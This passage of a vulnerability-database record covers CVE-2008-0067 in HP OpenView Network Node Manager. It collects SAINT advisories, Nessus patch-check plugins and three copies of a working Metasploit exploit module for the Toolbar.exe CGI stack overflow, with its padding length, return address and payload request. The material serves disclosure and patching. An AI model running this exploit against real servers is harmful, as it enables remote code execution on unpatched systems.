[CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by requesting the `**Toolbar.exe**` CGI program with a long, specially crafted parameter. \n\n### Resolution\n\nApply a fix when available, or restrict access to the `**Toolbar.exe**` CGI program. \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.5 on Windows 2000. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "reporter": "SAINT Corporation", "published": "2009-01-09T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "saint", "title": "HP OpenView Network Node Manager Toolbar.exe CGI buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0067"], "modified": "2009-01-09T00:00:00", "id": "SAINT:60781D8F8215D71A869B6AD65D30DCC1", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_toolbar", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:11", "references": [], "description": "Added: 03/23/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in the `**OpenView5.exe**` CGI program allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply one of the patches referenced in [HPSBMA02400 SSRT080144](<http://www.securityfocus.com/archive/1/500203>). \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53 on Windows 2000. \n\n### Platforms\n\nWindows \n \n\n", "edition": 3, "reporter": "SAINT Corporation", "published": "2009-03-23T00:00:00", "title": "HP OpenView Network Node Manager OpenView5.exe buffer overflow", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0067"], "modified": "2009-03-23T00:00:00", "id": "SAINT:39218AED3A8A26FBC38498E29AE58B12", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_openview5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:18", "references": [], "description": "Added: 01/09/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by requesting the `**Toolbar.exe**` CGI program with a long, specially crafted parameter. \n\n### Resolution\n\nApply a fix when available, or restrict access to the `**Toolbar.exe**` CGI program. \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.5 on Windows 2000. \n\n### Platforms\n\nWindows \n \n\n", "edition": 3, "reporter": "SAINT Corporation", "published": "2009-01-09T00:00:00", "title": "HP OpenView Network Node Manager Toolbar.exe CGI buffer overflow", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0067"], "modified": "2009-01-09T00:00:00", "id": "SAINT:4DBEF05031B06AE05590661C70DB2247", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_toolbar", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:05", "references": [], "edition": 1, "description": "Added: 01/14/2009 \nCVE: [CVE-2008-0067](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067>) \nBID: [33147](<http://www.securityfocus.com/bid/33147>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an HTTP request for the `**getcvdata.exe**` CGI program with a long, specially crafted parameter string. \n\n### Resolution\n\nRestrict access to the `**getcvdata.exe**` CGI program. Apply a fix when available. \n\n### References\n\n<http://secunia.com/secunia_research/2008-13/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\n### Platforms\n\nWindows 2000 \n \n\n", "reporter": "SAINT Corporation", "published": "2009-01-14T00:00:00", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "HP OpenView Network Node Manager getcvdata.exe parameter string buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0067"], "modified": "2009-01-14T00:00:00", "id": "SAINT:6FCA652A311F0464BEA896B694F06681", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getcvdata", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:19", "references": [], "edition": 1, "description": "", "reporter": "MC", "published": "2009-11-26T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0067"], "modified": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83092/HP-OpenView-Network-Node-Manager-Toolbar.exe-CGI-Buffer-Overflow.html", "id": "PACKETSTORM:83092", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in HP OpenView Network Node Manager 7.50. \nBy sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute \narbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2008-0067' ], \n[ 'OSVDB', '53222' ], \n[ 'BID', '33147' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 650, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 7 2009')) \n \nregister_options( [ Opt::RPORT(80) ], self.class ) \n \nend \n \ndef exploit \n \nsploit = rand_text_alpha_upper(5108) + [target.ret].pack('V') + payload.encoded \n \nprint_status(\"Trying target #{target.name}...\") \n \nsend_request_raw({ \n'uri' => \"/OvCgi/Toolbar.exe?\" + sploit, \n'method' => \"GET\", \n}, 5) \n \n \nhandler \n \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83092/hp_nnm_toolbar.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T08:04:01", "osvdbidlist": ["53222"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow. CVE-2008-0067. Remote exploit for windows platform", "reporter": "metasploit", "published": "2011-07-16T00:00:00", "type": "exploitdb", "title": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0067"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2011-07-16T00:00:00", "id": "EDB-ID:17536", "href": "https://www.exploit-db.com/exploits/17536/", "sourceData": "##\r\n# $Id: hp_nnm_toolbar_01.rb 13192 2011-07-16 04:45:21Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\r\n\t\t\t\tBy sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute\r\n\t\t\t\tarbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 13192 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-0067' ],\r\n\t\t\t\t\t[ 'OSVDB', '53222' ],\r\n\t\t\t\t\t[ 'BID', '33147' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 650,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jan 7 2009'))\r\n\r\n\t\tregister_options( [ Opt::RPORT(80) ], self.class )\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tsploit = rand_text_alpha_upper(5108) + [target.ret].pack('V') + payload.encoded\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tsend_request_raw({\r\n\t\t\t'uri'\t\t=> \"/OvCgi/Toolbar.exe?\" + sploit,\r\n\t\t\t'method'\t=> \"GET\",\r\n\t\t\t}, 5)\r\n\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17536/"}, {"lastseen": "2016-02-02T06:31:38", "osvdbidlist": ["53222"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow. CVE-2008-0067. Webapps exploit for cgi platform", "reporter": "metasploit", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0067"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16795", "href": "https://www.exploit-db.com/exploits/16795/", "sourceData": "##\r\n# $Id: hp_nnm_toolbar.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\r\n\t\t\t\tBy sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute\r\n\t\t\t\tarbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-0067' ],\r\n\t\t\t\t\t[ 'OSVDB', '53222' ],\r\n\t\t\t\t\t[ 'BID', '33147' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 650,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jan 7 2009'))\r\n\r\n\t\tregister_options( [ Opt::RPORT(80) ], self.class )\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tsploit = rand_text_alpha_upper(5108) + [target.ret].pack('V') + payload.encoded\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tsend_request_raw({\r\n\t\t\t'uri'\t\t=> \"/OvCgi/Toolbar.exe?\" + sploit,\r\n\t\t\t'method'\t=> \"GET\",\r\n\t\t\t}, 5)\r\n\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16795/"}], "metasploit": [{"lastseen": "2018-11-01T13:52:00", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "references": [], "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute arbitrary code.", "reporter": "Rapid7", "published": "2011-07-16T04:45:21", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/hp_nnm_toolbar_01.rb", "type": "metasploit", "title": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0067"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Great", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_TOOLBAR_01", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute\n arbitrary code.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2008-0067' ],\n [ 'OSVDB', '53222' ],\n [ 'BID', '33147' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 650,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jan 7 2009'))\n end\n\n def exploit\n\n sploit = rand_text_alpha_upper(5108) + [target.ret].pack('V') + payload.encoded\n\n print_status(\"Trying target #{target.name}...\")\n\n send_request_raw({\n 'uri'\t\t=> \"/OvCgi/Toolbar.exe?\" + sploit,\n 'method'\t=> \"GET\",\n }, 5)\n\n\n handler\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/hp_nnm_toolbar_01.rb"}], "nessus": [{"lastseen": "2018-09-01T23:49:42", "references": ["http://www.nessus.org/u?0bbcab1d", "http://www.nessus.org/u?45827469", "http://www.nessus.org/u?cdefacfb"], "pluginID": "39383", "description": "s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 22 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code. (HPSBMA02424 SSRT080125)\n\n - A potential vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code. (HPSBMA02425 SSRT080091)\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to allow execution of arbitrary code. (HPSBMA02400 SSRT080144)", "edition": 6, "reporter": "Tenable", "published": "2009-06-15T00:00:00", "title": "HP-UX PHSS_39245 : s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 22", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2438", "CVE-2008-0067", "CVE-2009-0720"], "modified": "2018-07-12T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_39245.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=39383", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_39245. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39383);\n script_version(\"1.36\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2008-0067\", \"CVE-2008-2438\", \"CVE-2009-0720\");\n script_bugtraq_id(34738, 34812);\n script_xref(name:\"HP\", value:\"emr_na-c01646081\");\n script_xref(name:\"HP\", value:\"emr_na-c01723303\");\n script_xref(name:\"HP\", value:\"emr_na-c01728300\");\n script_xref(name:\"HP\", value:\"SSRT080091\");\n script_xref(name:\"HP\", value:\"SSRT080125\");\n script_xref(name:\"HP\", value:\"SSRT080144\");\n\n script_name(english:\"HP-UX PHSS_39245 : s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 22\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 22 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential vulnerability has been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. (HPSBMA02424 SSRT080125)\n\n - A potential vulnerability has been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. (HPSBMA02425 SSRT080091)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to allow\n execution of arbitrary code. (HPSBMA02400 SSRT080144)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01646081\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdefacfb\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01723303\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?45827469\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01728300\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0bbcab1d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_39245 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94, 119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/18\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11 11.23 11.31\", proc:\"parisc\"))\n{\n exit(0, \"The host is not affected since PHSS_39245 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_39245\", \"PHSS_39639\", \"PHSS_39944\", \"PHSS_40374\", \"PHSS_40707\", \"PHSS_41242\", \"PHSS_41606\", \"PHSS_41857\", \"PHSS_42232\", \"PHSS_43046\", \"PHSS_43353\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-CORE\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-IPV6\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PD\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PESA\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVMIB-CONTRIB\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNM-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVRPT-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrMan.OVNNM-RUN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrRtDOC.OVNNM-ENG-DOC\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVDB-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVEVENT-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVMIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVPMD-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-EVNT\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-FW\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-SRV\", version:\"B.07.50.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:38:37", "references": ["http://www.nessus.org/u?0bbcab1d", "http://www.nessus.org/u?45827469", "http://www.nessus.org/u?cdefacfb"], "pluginID": "39384", "description": "s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 22 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to allow execution of arbitrary code. (HPSBMA02400 SSRT080144)\n\n - A potential vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code. (HPSBMA02424 SSRT080125)\n\n - A potential vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code. (HPSBMA02425 SSRT080091)", "edition": 6, "reporter": "Tenable", "published": "2009-06-15T00:00:00", "title": "HP-UX PHSS_39246 : s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 22", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2438", "CVE-2008-0067", "CVE-2009-0720"], "modified": "2018-07-12T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_39246.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=39384", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_39246. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39384);\n script_version(\"1.34\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2008-0067\", \"CVE-2008-2438\", 